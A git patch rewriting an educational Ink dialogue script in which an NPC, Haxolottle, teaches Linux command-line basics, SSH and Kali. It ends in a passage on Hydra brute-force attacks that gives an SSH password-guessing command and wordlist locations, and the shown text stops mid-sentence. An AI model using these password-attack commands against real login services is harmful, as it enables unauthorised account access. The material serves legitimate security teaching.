From be497931ded69eee3785b19f33ceafd44504099c Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Create reusable tool explanations and update intro_linux for game narrative - Add nmap_basics.ink, metasploit_basics.ink, netcat_basics.ink as reusable tools - Completely rewrite intro_linux.ink: - Remove all unnecessary tracking variables - Change from 'Tech Instructor' to 'Haxolottle' - Remove lab/training/exercise language - Convert to helpful NPC offering to explain concepts - Keep all technical content but make conversational - Link to reusable tool files where appropriate - Use proper ink patterns (hub structure, #exit_conversation) --- .../ink/game_scenarios/intro_linux.ink | 1016 +++++------------ .../tools/metasploit_basics.ink | 148 +++ .../game_scenarios/tools/netcat_basics.ink | 98 ++ .../ink/game_scenarios/tools/nmap_basics.ink | 85 ++ 4 files changed, 640 insertions(+), 707 deletions(-) create mode 100644 story_design/ink/game_scenarios/tools/metasploit_basics.ink create mode 100644 story_design/ink/game_scenarios/tools/netcat_basics.ink create mode 100644 story_design/ink/game_scenarios/tools/nmap_basics.ink diff --git a/story_design/ink/game_scenarios/intro_linux.ink b/story_design/ink/game_scenarios/intro_linux.ink index be48723..adcd3e8 100644 --- a/story_design/ink/game_scenarios/intro_linux.ink +++ b/story_design/ink/game_scenarios/intro_linux.ink @@ -1,942 +1,544 @@ -// =========================================== -// LINUX FUNDAMENTALS AND SECURITY LAB -// Introduction to Linux and Security -// =========================================== -// Game-Based Learning replacement for lab sheet -// Original: introducing_attacks/1_intro_linux.md -// =========================================== +// Linux Fundamentals - Game Scenario Version +// Helpful NPC dialogue for understanding Linux and security tools -// Progress tracking -VAR linux_basics_discussed = false -VAR command_line_skills_discussed = false -VAR vi_editor_discussed = false -VAR piping_discussed = false -VAR redirection_discussed = false -VAR networking_discussed = false -VAR ssh_discussed = false -VAR hydra_discussed = false -VAR kali_intro_discussed = false - -// Detailed topic tracking -VAR pwd_ls_discussed = false -VAR file_manipulation_discussed = false -VAR man_pages_discussed = false -VAR piping_examples_discussed = false -VAR redirection_examples_discussed = false -VAR ifconfig_discussed = false -VAR ssh_basics_discussed = false -VAR ssh_x_forwarding_discussed = false -VAR bruteforce_basics_discussed = false - -// Challenge completion -VAR completed_vi_challenge = false -VAR completed_piping_challenge = false -VAR completed_ssh_challenge = false -VAR completed_hydra_challenge = false - -// Instructor relationship -VAR instructor_rapport = 0 -VAR deep_dives_completed = 0 +// Global persistent state only +VAR haxolottle_rapport = 0 // External variables EXTERNAL player_name -// =========================================== -// ENTRY POINT - LINUX INSTRUCTOR -// =========================================== - === start === -~ instructor_rapport = 0 +Haxolottle: Hey there, {player_name}! Need some help with Linux? -Tech Instructor: Welcome to Linux Fundamentals and Security, Agent {player_name}. I'm your technical instructor for this session. +~ haxolottle_rapport = 0 -Tech Instructor: This lab covers essential Linux command-line skills, remote administration via SSH, and basic penetration testing techniques. All crucial skills for field operations. +Haxolottle: I know these command-line interfaces can be intimidating at first, little axolotl. -Tech Instructor: Think of this as building your foundational toolkit. Every SAFETYNET agent needs to be comfortable in Linux environments—most of our targets run Linux servers, and Kali Linux is our primary offensive platform. +Haxolottle: But trust me, once you get the hang of it, you'll wonder how you ever lived without it. --> linux_training_hub +Haxolottle: What would you like to know about? -// =========================================== -// MAIN TRAINING HUB -// =========================================== +-> linux_hub -=== linux_training_hub === +=== linux_hub === +Haxolottle: What can I help you understand? -Tech Instructor: What would you like to cover? - -+ {not linux_basics_discussed} [Learn about Linux basics and why it matters] - -> linux_basics_intro -+ {not command_line_skills_discussed} [Essential command-line skills] - -> command_line_skills -+ {not vi_editor_discussed} [Learn the vi editor] - -> vi_editor_intro -+ {not piping_discussed} [Piping between programs] - -> piping_intro -+ {not redirection_discussed} [Redirecting input and output] - -> redirection_intro -+ {not networking_discussed} [Basic Linux networking] - -> networking_basics -+ {not kali_intro_discussed} [Introduction to Kali Linux] - -> kali_intro -+ {not ssh_discussed} [Remote shell access with SSH] - -> ssh_intro -+ {not hydra_discussed} [Attacking SSH with Hydra] - -> hydra_intro -+ {linux_basics_discussed and command_line_skills_discussed} [Show me the essential commands reference] ++ [Why Linux? Why not just use Windows?] + -> why_linux ++ [Basic command-line navigation] + -> command_line_basics ++ [The vi text editor] + -> vi_editor ++ [Piping commands together] + -> piping ++ [Redirecting output to files] + -> redirection ++ [Linux networking basics] + -> networking ++ [SSH - connecting to remote systems] + -> ssh_basics ++ [Hydra - password attacks] + -> hydra_tool ++ [What's Kali Linux?] + -> kali_linux ++ [Show me a commands cheat sheet] -> commands_reference -+ {ssh_discussed or hydra_discussed} [Tips for the hands-on challenges] - -> challenge_tips -+ [I'm ready to start the practical exercises] - -> ready_for_practice -+ [That's all I need for now] - -> end_session ++ [I'm good for now, thanks] + #exit_conversation + -> END -// =========================================== -// LINUX BASICS -// =========================================== +=== why_linux === +Haxolottle: Good question! Linux runs most of the servers on the internet. -=== linux_basics_intro === -~ linux_basics_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Tech Instructor: Excellent starting point. Let me explain why Linux matters for security work. +Haxolottle: Web servers, database servers, email servers - they're almost all Linux. -Tech Instructor: Linux is the backbone of modern internet infrastructure. Google, Facebook, Amazon—they all run Linux servers at massive scale. When you're conducting penetration tests or investigating security incidents, you'll encounter Linux systems constantly. +Haxolottle: So if you need to access those systems, you better know your way around Linux. -Tech Instructor: More importantly for us, the best security tools are Linux-native. Kali Linux contains hundreds of specialized tools for penetration testing, forensics, and security analysis. Mastering Linux means mastering your toolkit. +Haxolottle: Plus, all the best security tools are built for Linux. Kali Linux is packed with them. -Tech Instructor: Linux comes in many "distributions"—different flavors packaged for different purposes. Ubuntu for ease of use, Debian for stability, Kali for security testing. They all share the same core commands and concepts, so learning one helps you understand them all. ++ [What makes Linux good for security work?] + Haxolottle: A few things, really. -* [Why not just use Windows?] - ~ deep_dives_completed += 1 - You: Why can't we just use Windows for security work? - -> windows_comparison -* [What makes Kali special?] - ~ deep_dives_completed += 1 - You: What specifically makes Kali Linux the industry standard? - -> kali_explanation -* [Got it, let's move on] - You: Understood. Linux is essential for security work. - -> linux_training_hub + Haxolottle: Open source - you can see exactly what the code does, no hidden backdoors. -=== windows_comparison === -~ instructor_rapport += 8 + Haxolottle: Command-line focused - scripts and automation are easy. -Tech Instructor: Fair question. Windows absolutely has its place—many enterprise environments are Windows-heavy, and you'll need those skills too. + Haxolottle: Powerful tools - Nmap, Metasploit, Wireshark, all built for Linux first. -Tech Instructor: But for offensive security work, Linux has three major advantages: + Haxolottle: And the community - security researchers love Linux, so that's where the tools are. -Tech Instructor: **First**, the tools. Most cutting-edge security research happens in the open-source community, and those tools are Linux-first. Sure, some get ported to Windows eventually, but you'll always be behind the curve. ++ [Tell me about Kali Linux specifically] + -> kali_linux -Tech Instructor: **Second**, the control. Linux gives you deep system access and transparency. You can see exactly what's happening, modify anything, and automate everything. That level of control is crucial when you're trying to exploit systems or analyze malware. +- -> linux_hub -Tech Instructor: **Third**, the culture. The security community lives in Linux. Understanding Linux means understanding how other security professionals work, communicate, and share knowledge. +=== command_line_basics === +Haxolottle: The command line is your interface to the system, little axolotl. -~ instructor_rapport += 5 --> linux_training_hub +~ haxolottle_rapport += 5 -=== kali_explanation === -~ instructor_rapport += 8 +Haxolottle: Instead of clicking icons, you type commands. More powerful, faster once you know it. -Tech Instructor: Kali is essentially a curated arsenal of security tools, all pre-configured and ready to use. +Haxolottle: Let me show you the essentials. -Tech Instructor: Offensive Security—the company behind Kali—maintains hundreds of tools across every category: information gathering, vulnerability analysis, wireless attacks, exploitation, post-exploitation, forensics, you name it. ++ [How do I see where I am?] + Haxolottle: Use pwd - "print working directory" -Tech Instructor: What makes Kali special isn't just the tools, though. It's the integration. Everything works together. The tools are kept up-to-date. Documentation is solid. And it's become the lingua franca of penetration testing—when security professionals share techniques, they assume you're using Kali. + Haxolottle: It shows your current location in the file system. -Tech Instructor: Think of it like this: you *could* build your own toolkit from scratch, hunting down each tool individually and figuring out dependencies. Or you could use Kali and get straight to the actual security work. + Haxolottle: Like: /home/kali or /root or /etc -~ instructor_rapport += 5 --> linux_training_hub ++ [How do I see what files are here?] + Haxolottle: Use ls - "list" -// =========================================== -// COMMAND-LINE SKILLS -// =========================================== + Haxolottle: Basic: ls shows files and directories -=== command_line_skills === -~ command_line_skills_discussed = true -~ instructor_rapport += 5 + Haxolottle: Detailed: ls -la shows hidden files, permissions, sizes, everything -Tech Instructor: Right, let's build your command-line fundamentals. These are skills you'll use every single day in the field. + Haxolottle: The -l flag means "long format" and -a means "all files including hidden ones" -Tech Instructor: The command line might seem archaic compared to graphical interfaces, but it's exponentially more powerful. You can automate tasks, chain commands together, work on remote systems, and handle massive datasets—all from a simple text interface. ++ [How do I move around?] + Haxolottle: Use cd - "change directory" -Tech Instructor: I'll cover the essential commands: navigating the filesystem, manipulating files and directories, viewing content, and getting help when you're stuck. + Haxolottle: cd /etc moves to /etc directory -* [Show me the navigation commands] - ~ pwd_ls_discussed = true - You: How do I navigate the filesystem? - -> navigation_commands -* [How do I work with files?] - ~ file_manipulation_discussed = true - You: What about creating and editing files? - -> file_manipulation -* [How do I get help when stuck?] - ~ man_pages_discussed = true - You: What if I don't know what a command does? - -> man_pages -* [I want to see the full command reference] - You: Can I see a complete list of essential commands? - -> commands_reference + Haxolottle: cd .. goes up one level -=== navigation_commands === -~ instructor_rapport += 3 + Haxolottle: cd ~ or just cd goes to your home directory -Tech Instructor: Navigation is your foundation. Here are the essentials: ++ [How do I read file contents?] + Haxolottle: Several ways: -Tech Instructor: **pwd** - "print working directory". Shows exactly where you are in the filesystem. Lost? Run pwd. + Haxolottle: cat filename - dumps the whole file to screen -Tech Instructor: **ls** - lists files in your current directory. Add "-la" for detailed information including hidden files and permissions. You'll use "ls -la" constantly. + Haxolottle: less filename - view file page by page (press q to quit) -Tech Instructor: **cd** - "change directory". Moves you around the filesystem. "cd .." goes up one level, "cd" alone takes you home. + Haxolottle: head filename - just the first 10 lines -Tech Instructor: Pro tip: pressing Tab autocompletes filenames and commands. Type a few letters, hit Tab, save yourself endless typing. And use the up arrow to cycle through previous commands. + Haxolottle: tail filename - just the last 10 lines -* [Tell me more about ls flags] - You: What other useful flags does ls have? - Tech Instructor: Great question. "ls -lt" sorts by modification time, newest first. "ls -lh" shows human-readable file sizes. "ls -lR" recursively lists subdirectories. You can combine them: "ls -lhta" shows all files, human-readable sizes, sorted by time. - ~ instructor_rapport += 5 - -> command_line_followup -* [What about hidden files?] - You: What are hidden files? - Tech Instructor: In Linux, files starting with "." are hidden—they don't show up in normal ls output. Configuration files are typically hidden. Use "ls -a" to see them. You'll frequently need to examine hidden config files during security assessments. - ~ instructor_rapport += 5 - -> command_line_followup -* [Got it] - -> command_line_followup ++ [How do I create, copy, move, or delete files?] + Haxolottle: Creating: touch filename makes an empty file -=== command_line_followup === -+ [Show me file manipulation commands] - -> file_manipulation -+ [How do I get help when stuck?] - -> man_pages -+ [Back to the main menu] - -> linux_training_hub + Haxolottle: Copying: cp source destination -=== file_manipulation === -~ instructor_rapport += 3 + Haxolottle: Moving/renaming: mv source destination -Tech Instructor: Creating, copying, moving, and viewing files. Bread and butter stuff. + Haxolottle: Deleting: rm filename (careful, no undo!) -Tech Instructor: **mkdir** - creates directories. "mkdir mydir" creates a new folder. + Haxolottle: Creating directories: mkdir dirname -Tech Instructor: **cp** - copies files. "cp source destination" copies a file. Add "-r" for recursive directory copying. ++ [How do I get help on commands?] + Haxolottle: Use man - "manual" -Tech Instructor: **mv** - moves or renames files. "mv oldname newname" renames. "mv file /path/to/destination/" moves it. + Haxolottle: man ls shows the manual for ls -Tech Instructor: **cat** - dumps file contents to the screen. "cat filename" shows the whole file. + Haxolottle: man ssh shows the manual for ssh -Tech Instructor: **echo** - prints text. "echo 'hello world'" displays text. Useful for testing and scripting. + Haxolottle: Press space to page down, q to quit -* [Tell me more about viewing files] - You: Cat seems limited for large files... - Tech Instructor: Exactly right. For large files, use **less**. "less filename" lets you scroll through, search with "/", quit with "q". Much more practical than cat for big files. - ~ instructor_rapport += 8 - -> command_line_followup -* [What about creating files?] - You: How do I create a new empty file? - Tech Instructor: Several ways. "touch filename" creates an empty file. Or redirect output: "echo 'content' > filename" creates a file with content. We'll cover redirection shortly. - ~ instructor_rapport += 5 - -> command_line_followup -* [Understood] - -> command_line_followup + Haxolottle: Or try command --help for quick help -=== man_pages === -~ man_pages_discussed = true -~ instructor_rapport += 8 ++ [Got it, thanks] + -> linux_hub -Tech Instructor: This is possibly the most important skill: learning to teach yourself. +- -> linux_hub -Tech Instructor: **man** - the manual pages. "man command" shows comprehensive documentation for any command. Navigation: space to page down, "b" to page up, "/" to search, "q" to quit. +=== vi_editor === +Haxolottle: Ah, vi. The editor people love to hate until they love it. -Tech Instructor: Example: "man ls" shows every flag and option for ls. The man pages are detailed, sometimes overwhelming, but they're authoritative. +~ haxolottle_rapport += 5 -Tech Instructor: Alternative: **info** command provides similar documentation, sometimes more detailed. +Haxolottle: It's on every Linux system, so you need to know the basics. -Tech Instructor: Pro tip: if you're really stuck, try "command --help" for a quick summary. Many tools also have online documentation, but man pages are always available, even when you're offline on a compromised system with no internet. +Haxolottle: Vi has modes - that's the weird part for beginners. -* [How do I search man pages?] - You: Can I search across all man pages for a topic? - Tech Instructor: Yes. "man -k keyword" searches all man page descriptions. "apropos keyword" does the same thing. Useful when you know what you want to do but not which command does it. - ~ instructor_rapport += 10 - -> command_line_followup -* [What if man pages are too dense?] - You: Man pages can be pretty technical... - Tech Instructor: True. For beginner-friendly explanations, try "tldr command"—it shows simplified examples. Or search online for "command examples". But learning to parse man pages is a skill worth developing. They're accurate, complete, and always available. - ~ instructor_rapport += 8 - -> command_line_followup -* [Makes sense] - -> command_line_followup ++ [What are these modes?] + Haxolottle: Two main modes: -// =========================================== -// VI EDITOR -// =========================================== + Haxolottle: **Command mode** - for navigation and commands (default when you open vi) -=== vi_editor_intro === -~ vi_editor_discussed = true -~ instructor_rapport += 5 + Haxolottle: **Insert mode** - for actually typing text -Tech Instructor: Ah, vi. The editor that's been causing both frustration and devotion since 1976. + Haxolottle: Press i to enter insert mode, Esc to go back to command mode. -Tech Instructor: Here's why you need to know vi: it's on *every* Unix and Linux system. When you SSH into a compromised server with minimal tools, vi will be there. Other editors might not be. ++ [How do I open a file?] + Haxolottle: vi filename opens or creates the file -Tech Instructor: Vi is modal. Two main modes: **normal mode** for commands, **insert mode** for typing text. + Haxolottle: You start in command mode. Press i to start typing. -Tech Instructor: The essentials: -- "vi filename" opens or creates a file -- Press "i" to enter insert mode (now you can type) -- Press Esc to return to normal mode -- In normal mode: ":wq" writes and quits, ":q!" quits without saving ++ [How do I save and quit?] + Haxolottle: From command mode (press Esc first if needed): -Tech Instructor: That's literally everything you need to survive vi. + Haxolottle: :w saves (write) -* [Tell me more about normal mode commands] - ~ deep_dives_completed += 1 - You: What else can I do in normal mode? - -> vi_advanced_commands -* [Why not use nano or another editor?] - You: Why not just use nano? It seems simpler. - Tech Instructor: Nano is fine for quick edits. But vi is universal and powerful. On hardened systems or embedded devices, vi might be your only option. Plus, once you learn it, vi is dramatically faster. Your call, but I recommend at least learning vi basics. - ~ instructor_rapport += 5 - -> vi_editor_followup -* [I'll learn the basics] - ~ completed_vi_challenge = true - You: Got it. I'll practice the essential commands. - -> vi_editor_followup + Haxolottle: :q quits -=== vi_advanced_commands === -~ instructor_rapport += 8 + Haxolottle: :wq saves and quits -Tech Instructor: Want to unlock vi's power? Here are some favorites: + Haxolottle: :q! quits without saving (force quit) -Tech Instructor: **Navigation in normal mode:** -- "h" "j" "k" "l" move cursor left, down, up, right -- "w" jumps forward by word, "b" jumps back -- "gg" jumps to start of file, "G" jumps to end ++ [Basic navigation in command mode?] + Haxolottle: Arrow keys work, but vi users use: -Tech Instructor: **Editing in normal mode:** -- "dd" deletes current line -- "30dd" deletes 30 lines -- "yy" copies (yanks) current line -- "p" pastes -- "u" undo -- "/" searches, "n" finds next match + Haxolottle: h (left), j (down), k (up), l (right) -Tech Instructor: You can combine commands: "d10j" deletes 10 lines down. "c3w" changes next 3 words. + Haxolottle: w (next word), b (back word) -Tech Instructor: Ten minutes with a vi tutorial will make you look like a wizard. It's worth it. + Haxolottle: 0 (start of line), $ (end of line) -~ instructor_rapport += 10 --> vi_editor_followup + Haxolottle: gg (start of file), G (end of file) -=== vi_editor_followup === -+ [Back to main menu] - -> linux_training_hub ++ [Quick reference?] + Haxolottle: Here's what you really need: -// =========================================== -// PIPING -// =========================================== + Haxolottle: Open: vi filename -=== piping_intro === -~ piping_discussed = true -~ instructor_rapport += 5 + Haxolottle: Enter insert mode: i -Tech Instructor: Piping is where Linux becomes genuinely powerful. You can chain simple commands together to accomplish complex tasks. + Haxolottle: Exit insert mode: Esc -Tech Instructor: The pipe operator "|" sends the output of one command to the input of another. + Haxolottle: Save and quit: :wq -Tech Instructor: Example: "cat /etc/passwd | grep /home/" + Haxolottle: Quit without saving: :q! -Tech Instructor: This reads the passwd file and filters it to only lines containing "/home/". Two simple commands, combined to do something useful. + Haxolottle: That'll get you through 90% of situations. -Tech Instructor: You can chain multiple pipes: "cat /etc/passwd | grep /home/ | sort -r" - now it's filtered *and* sorted in reverse. ++ [I think I understand] + -> linux_hub -* [Show me more examples] - ~ piping_examples_discussed = true - You: What are some practical piping examples? - -> piping_examples -* [What commands work well with pipes?] - You: Which commands are commonly piped together? - -> piping_common_commands -* [I've got the concept] - ~ completed_piping_challenge = true - -> linux_training_hub +- -> linux_hub -=== piping_examples === -~ instructor_rapport += 8 +=== piping === +Haxolottle: Piping is beautiful, little axolotl. It's the Unix philosophy. -Tech Instructor: Here are real-world examples you'll use constantly: +~ haxolottle_rapport += 5 -Tech Instructor: **Finding running processes:** -"ps aux | grep ssh" - lists all processes, filters for SSH-related ones. +Haxolottle: Take the output of one program and feed it as input to another. -Tech Instructor: **Analyzing logs:** -"cat logfile | grep ERROR | sort | uniq -c | sort -nr" - finds errors, sorts them, counts unique occurrences, sorts by frequency. One line, powerful analysis. +Haxolottle: The pipe symbol is: | -Tech Instructor: **Network analysis:** -"netstat -an | grep ESTABLISHED" - shows active network connections. ++ [Show me an example] + Haxolottle: Classic example: ls -la | less -Tech Instructor: **Counting things:** -"ls | wc -l" - counts files in current directory. + Haxolottle: List all files, but pipe it through less so you can scroll through it. -Tech Instructor: The Unix philosophy: small tools that do one thing well, combined creatively. Piping is how you combine them. + Haxolottle: Another: cat /etc/passwd | grep root -~ completed_piping_challenge = true -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: Show the passwd file, but filter for lines containing "root" -=== piping_common_commands === -~ instructor_rapport += 8 + Haxolottle: Or: ps aux | grep ssh -Tech Instructor: Commands that work brilliantly in pipes: + Haxolottle: List all processes, find the ones related to SSH. -Tech Instructor: **grep** - filters lines matching a pattern. Your most-used pipe command. ++ [What's grep?] + Haxolottle: Grep is your search tool - "Global Regular Expression Print" -Tech Instructor: **sort** - sorts lines alphabetically. "-n" for numeric sort, "-r" for reverse. + Haxolottle: grep pattern filename searches a file -Tech Instructor: **uniq** - removes duplicate adjacent lines. Usually used after sort. "-c" counts occurrences. + Haxolottle: grep -i pattern filename makes it case-insensitive -Tech Instructor: **head** and **tail** - show first or last N lines. "head -20" shows first 20 lines. + Haxolottle: grep -r pattern directory searches recursively -Tech Instructor: **wc** - word count. "-l" counts lines, "-w" counts words, "-c" counts characters. + Haxolottle: grep is incredibly powerful with piping. -Tech Instructor: **cut** - extracts columns from text. "cut -d: -f1" splits on colons, takes first field. ++ [Any other useful pipes?] + Haxolottle: Oh tons. Here are favorites: -Tech Instructor: **awk** and **sed** - powerful text processing. More advanced, but incredibly useful. + Haxolottle: command | wc -l counts lines of output -Tech Instructor: Learn these, and you can process massive datasets from the command line. + Haxolottle: command | sort sorts the output -~ completed_piping_challenge = true -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: command | uniq removes duplicate lines -// =========================================== -// REDIRECTION -// =========================================== + Haxolottle: command | head -n 20 shows first 20 lines -=== redirection_intro === -~ redirection_discussed = true -~ instructor_rapport += 5 + Haxolottle: You can chain multiple: ls | grep .txt | wc -l (counts .txt files) -Tech Instructor: Redirection lets you send command output to files or read input from files. ++ [Got it] + -> linux_hub -Tech Instructor: Three key operators: +- -> linux_hub -Tech Instructor: **>** - redirects output to a file, overwriting it. "ls > filelist.txt" saves directory listing to a file. +=== redirection === +Haxolottle: Redirection lets you save output to files or read input from files. -Tech Instructor: **>>** - redirects output to a file, appending. "echo 'new line' >> file.txt" adds to the end. +~ haxolottle_rapport += 5 -Tech Instructor: **<** - reads input from a file. "wc -l < file.txt" counts lines in the file. +Haxolottle: Three main operators: >, <, and >> -Tech Instructor: Practical example: "ps aux > processes.txt" saves a snapshot of running processes for analysis. ++ [What does > do?] + Haxolottle: The > redirects output to a file (overwrites if it exists): -* [Show me more redirection examples] - ~ redirection_examples_discussed = true - You: What are some practical redirection scenarios? - -> redirection_examples -* [What about error messages?] - You: Can I redirect error messages too? - -> stderr_redirection -* [Understood] - -> linux_training_hub + Haxolottle: ls > files.txt saves the ls output to files.txt -=== redirection_examples === -~ instructor_rapport += 8 + Haxolottle: echo "Hello" > message.txt creates a file with that text -Tech Instructor: Practical redirection scenarios: + Haxolottle: Careful - it overwrites the file! -Tech Instructor: **Saving command output for later:** -"ifconfig > network_config.txt" - captures network configuration. ++ [What does >> do?] + Haxolottle: The >> appends to a file instead of overwriting: -Tech Instructor: **Building logs:** -"echo '$(date): Scan completed' >> scan_log.txt" - appends timestamped entries. + Haxolottle: echo "New line" >> message.txt adds to the end -Tech Instructor: **Combining with pipes:** -"cat /etc/passwd | grep /home/ > users.txt" - filters and saves results. + Haxolottle: Safer when you don't want to lose existing content. -Tech Instructor: **Quick file creation:** -"echo 'test content' > test.txt" - creates a file with content in one command. ++ [What does < do?] + Haxolottle: The < reads input from a file: -Tech Instructor: During security assessments, you'll constantly redirect command output to files for documentation and later analysis. + Haxolottle: mysql < database.sql feeds a SQL file to MySQL -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: sort < unsorted.txt sorts the file contents -=== stderr_redirection === -~ instructor_rapport += 10 + Haxolottle: Honestly, you'll use > and >> way more than < -Tech Instructor: Good catch. There are actually two output streams: stdout (standard output) and stderr (standard error). ++ [Can I combine piping and redirection?] + Haxolottle: Absolutely! They work great together: -Tech Instructor: By default, ">" only redirects stdout. Error messages still appear on screen. + Haxolottle: cat file.txt | grep error | sort > errors.txt -Tech Instructor: To redirect stderr: "command 2> errors.txt" + Haxolottle: Search for errors, sort them, save to a file. -Tech Instructor: To redirect both: "command > output.txt 2>&1" - sends stderr to stdout, which goes to the file. + Haxolottle: ls -la | grep ".txt" >> text_files.txt -Tech Instructor: Or in modern Bash: "command &> output.txt" does the same thing more simply. + Haxolottle: Find .txt files, append to a list. -Tech Instructor: To discard output entirely: "command > /dev/null 2>&1" - sends everything to the void. ++ [Clear] + -> linux_hub -Tech Instructor: This is advanced stuff, but incredibly useful when scripting or when you want clean output. +- -> linux_hub -~ instructor_rapport += 10 --> linux_training_hub +=== networking === +Haxolottle: Linux networking - how to see your network config and connections. -// =========================================== -// NETWORKING BASICS -// =========================================== +~ haxolottle_rapport += 5 -=== networking_basics === -~ networking_discussed = true -~ instructor_rapport += 5 ++ [How do I see my IP address?] + Haxolottle: Two commands, depending on your Linux version: -Tech Instructor: Linux networking commands. Essential for understanding network configurations and troubleshooting connectivity. + Haxolottle: ip a or ip addr show (modern systems) -Tech Instructor: **ifconfig** - the classic command to view network interfaces and IP addresses. Shows all your network adapters. + Haxolottle: ifconfig (older systems, but still common) -Tech Instructor: **ip** - the modern replacement. "ip a s" (ip address show) does the same thing. You'll see both used in the field. + Haxolottle: Look for inet entries - that's your IP. -Tech Instructor: **hostname -I** - quick way to display just your IP address. ++ [How do I see active connections?] + Haxolottle: netstat -tulpn shows listening ports and connections -Tech Instructor: In our environment, your IP typically starts with "172.22" or "10" - those are private network ranges. + Haxolottle: ss -tulpn is the modern replacement, faster -* [Tell me more about network interfaces] - ~ ifconfig_discussed = true - You: What are network interfaces exactly? - -> network_interfaces -* [How do I troubleshoot network issues?] - You: What if my network isn't working? - -> network_troubleshooting -* [What about finding other machines?] - You: How do I discover other systems on the network? - Tech Instructor: Good question, but that's scanning territory. We'll cover tools like nmap in the scanning module. For now, focus on understanding your own network configuration. - ~ instructor_rapport += 5 - -> linux_training_hub -* [Got it] - -> linux_training_hub + Haxolottle: -t is TCP, -u is UDP, -l is listening, -p is programs, -n is numeric (don't resolve names) -=== network_interfaces === -~ instructor_rapport += 8 ++ [How do I test network connectivity?] + Haxolottle: ping TARGET tests basic connectivity: -Tech Instructor: Network interfaces are how your computer connects to networks. Think of them as connection points. + Haxolottle: ping 8.8.8.8 checks if you can reach Google's DNS -Tech Instructor: **eth0, eth1** - Ethernet interfaces. Physical network ports. + Haxolottle: ping -c 4 TARGET sends just 4 packets (otherwise it's infinite) -Tech Instructor: **wlan0** - Wireless interface. WiFi adapter. ++ [I understand] + -> linux_hub -Tech Instructor: **lo** - Loopback interface, always 127.0.0.1. Your computer talking to itself. Useful for testing. +- -> linux_hub -Tech Instructor: **Virtual interfaces** - VPNs and containers create virtual interfaces like tun0, tap0, docker0. +=== ssh_basics === +Haxolottle: SSH - Secure Shell - is how you connect to remote Linux systems. -Tech Instructor: When you run ifconfig, you see all interfaces, their IP addresses, MAC addresses, and traffic statistics. Essential information for network security assessments. +~ haxolottle_rapport += 5 -~ instructor_rapport += 5 --> linux_training_hub +Haxolottle: It's encrypted, so your commands and passwords aren't sent in plaintext. -=== network_troubleshooting === -~ instructor_rapport += 8 ++ [How do I connect with SSH?] + Haxolottle: Basic: ssh username@hostname -Tech Instructor: Basic network troubleshooting steps: + Haxolottle: Like: ssh root@10.0.0.5 -Tech Instructor: **Step 1:** Check interface status with "ifconfig" or "ip a s". Is the interface up? Does it have an IP? + Haxolottle: It'll ask for the password, then you're in. -Tech Instructor: **Step 2:** If no IP, try "dhclient eth0" to request one from DHCP server. + Haxolottle: To exit the SSH session, type exit or press Ctrl-D -Tech Instructor: **Step 3:** Test local connectivity: "ping 127.0.0.1" tests your network stack. ++ [What if SSH is on a different port?] + Haxolottle: Use -p flag: ssh -p 2222 username@hostname -Tech Instructor: **Step 4:** Test gateway: "ping your_gateway_ip" tests local network. + Haxolottle: Default is port 22, but admins sometimes change it. -Tech Instructor: **Step 5:** Test DNS: "ping google.com" tests name resolution and external connectivity. ++ [Can I run GUI programs over SSH?] + Haxolottle: Yes! Use X forwarding: ssh -X username@hostname -Tech Instructor: In our lab environment, if you're having issues, usually dhclient fixes it. In the field, troubleshooting can be much more complex. + Haxolottle: Then you can run graphical programs and they display on your screen. -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: Like: ssh -X user@10.0.0.5 then run firefox -// =========================================== -// KALI LINUX -// =========================================== + Haxolottle: The program runs on the remote system but displays locally. -=== kali_intro === -~ kali_intro_discussed = true -~ instructor_rapport += 5 ++ [What about SSH keys instead of passwords?] + Haxolottle: Way more secure! Generate keys with: ssh-keygen -Tech Instructor: Kali Linux. Your primary offensive security platform. + Haxolottle: Copy your public key to the server: ssh-copy-id user@host -Tech Instructor: Released by Offensive Security in 2013 as the successor to BackTrack Linux. It's specifically designed for penetration testing, security auditing, and digital forensics. + Haxolottle: Then you can log in without typing a password. -Tech Instructor: Kali includes hundreds of pre-installed tools organized by category: information gathering, vulnerability analysis, wireless attacks, web applications, exploitation tools, password attacks, forensics, and more. + Haxolottle: The server checks your private key (which never leaves your machine). -Tech Instructor: Default credentials: username "kali", password "kali". Never use Kali as your primary OS—it's designed for security testing, not everyday computing. ++ [Got it] + -> linux_hub -* [Show me what tools are available] - You: What kinds of tools are we talking about? - -> kali_tools_overview -* [How is Kali organized?] - You: How do I find the right tool for a task? - -> kali_organization -* [Sounds powerful] - -> linux_training_hub +- -> linux_hub -=== kali_tools_overview === -~ instructor_rapport += 8 +=== hydra_tool === +Haxolottle: Hydra is a password cracker, little axolotl. -Tech Instructor: Let me give you a taste of what's available: +~ haxolottle_rapport += 5 -Tech Instructor: **Information Gathering:** nmap, dnsenum, whois, recon-ng. Tools for mapping networks and gathering intelligence. +Haxolottle: It does brute force and dictionary attacks against login services. -Tech Instructor: **Vulnerability Analysis:** Nessus, OpenVAS, nikto. Automated scanners that identify security weaknesses. +Haxolottle: SSH, FTP, HTTP, you name it - Hydra can attack it. -Tech Instructor: **Exploitation:** Metasploit Framework, BeEF, sqlmap. Tools for actively exploiting vulnerabilities. ++ [How does it work?] + Haxolottle: Hydra tries many username/password combinations rapidly. -Tech Instructor: **Password Attacks:** Hydra, John the Ripper, hashcat. Cracking and bruteforcing credentials. + Haxolottle: You give it a wordlist of passwords, and it tries each one. -Tech Instructor: **Wireless Attacks:** Aircrack-ng, Reaver, Wifite. WiFi security testing. + Haxolottle: Eventually it finds one that works (if it's in the wordlist). -Tech Instructor: **Forensics:** Autopsy, Sleuth Kit, Volatility. Analyzing systems and recovering data. ++ [Show me the basic command] + Haxolottle: For SSH: hydra -l username -P passwordlist.txt ssh://TARGET -Tech Instructor: And those are just highlights. Run "ls /usr/bin" to see hundreds more. It's an arsenal. + Haxolottle: -l is the login name (single user) -~ instructor_rapport += 5 --> linux_training_hub + Haxolottle: -P is the password file (capital P for file) -=== kali_organization === -~ instructor_rapport += 8 + Haxolottle: Or use -L for a user list and -p for a single password -Tech Instructor: Kali organizes tools by the penetration testing lifecycle: ++ [Where do I get password lists?] + Haxolottle: Kali Linux comes with some: /usr/share/wordlists/ -Tech Instructor: **Phase 1 - Information Gathering:** Passive and active reconnaissance. Learning about your target. + Haxolottle: rockyou.txt is 